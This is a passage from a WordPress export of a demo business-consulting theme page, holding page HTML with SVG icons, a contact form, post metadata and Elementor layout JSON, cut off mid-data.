			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.
									</li>
						</ul>
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home5-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />											
		<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.</p><p>Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.</p>		
			<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Contacts</h5>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg" alt="" loading="lazy" />								</a>
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>999</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[support-function]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"49a9e54","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"f99cdb9","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"02efcb6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"2ce419a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"6119ae9","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"61708e5","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"842b3f0","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"6339130","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"306f17a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"781b565","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdc54b6","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8335d80","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8f5e31e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"e5c28dd","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"080e76c","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#52C5B6","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ea3f620","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16b4e3e","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3893a38","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"29df260","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"348e8e4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b035bd5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"93ca462","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"899f255","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"72fb2ed","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"ccc4166","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home5.png","id":2372},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"31ae611","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"4d5a916","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #52c5b6;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"bdf1c78","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4a42617","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"d6f9d84","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1eca910","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"ece40a4","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"e3aefa2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"18deaa2","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"f3267e7","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#52C5B6","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb2e77","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"64a2dd8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"87b1729","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"f10f882","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9647d28","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"89800c0","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"a10b197","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1f4fc86","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7074fb9","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open 